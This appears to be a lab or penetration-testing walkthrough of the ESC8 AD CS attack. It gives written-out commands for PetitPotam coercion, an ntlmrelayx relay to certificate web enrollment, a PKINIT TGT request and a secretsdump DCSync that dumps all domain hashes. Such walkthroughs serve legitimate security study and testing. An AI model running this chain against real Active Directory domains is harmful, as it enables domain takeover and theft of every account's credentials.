ESC8 - coerce to domain admin

Active Directory Certificate Services (AD CS) in Windows Server® 2012. AD CS is the Server Role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.

PetitPotam is a classic NTLM Relay Attack, and such attacks have been previously documented by Microsoft along with numerous mitigation options to protect customers. For example: Microsoft Security Advisory 974926.

• To make this attack work we will need :

  • ADCS running on the domain with web enrollment enabled.

  • A working coerce method (here we use petitpotam unauthent, but an authenticated printerbug or other coerce methods will work the same)

  • There is a useful template to exploit ESC8, by default on an active directory, its name is DomainController

• Let’s check if the web enrollement is up and running at : http://192.168.56.23/certsrv/certfnsh.asp

• Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx

sudo ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

• Launch the coerce with petitpotam unauthenticated (this will no more work on an up to date active directory but other coerce methods authenticated will work the same)

python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local

• ntlmrelayx will relay the authentication to the web enrollment and get the certificate

• Ask for a TGT with the certificate we just get (we copied it to the file cert.b64)

• download it from here: https://raw.githubusercontent.com/dirkjanm/PKINITtools/master/gettgtpkinit.py

python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) 'maryland.local'/'baltimore$' 'baltimore.ccache'

• And now we got a TGT for baltimore so we can launch a DCsync and get all the ntds.dit content.

export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local